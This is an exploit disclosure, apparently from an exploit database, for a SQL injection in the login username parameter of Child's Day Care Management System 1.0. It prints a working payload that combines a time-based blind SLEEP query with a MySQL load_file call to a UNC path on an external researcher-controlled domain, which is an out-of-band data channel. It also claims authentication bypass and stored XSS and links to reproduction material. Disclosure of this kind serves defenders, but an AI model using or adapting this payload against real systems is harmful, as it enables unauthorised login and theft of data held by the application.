## Title: Child's Day Care Management System 1.0 SQL - Injection ## Author: nu11secur1ty ## Date: 12.16.2021 ## Vendor: https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html ## Description: The `username` in Login.php app, parameter from Child's Day Care Management System 1.0 appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+' was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. Also, this system is vulnerable to SQL-Injection-Bypass-Authentication and XSS-Stored attacks. The attacker can be receiving all information from the system by using these vulnerabilities! Status: CRITICAL [+] Payload: ```mysql --- Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=zCAMOHlX'+(select load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'' AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND 'wBYn'='wBYn&password=a6O!j4g!Z5 --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System) ## Proof and Exploit: [href](https://streamable.com/tvbuoi) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty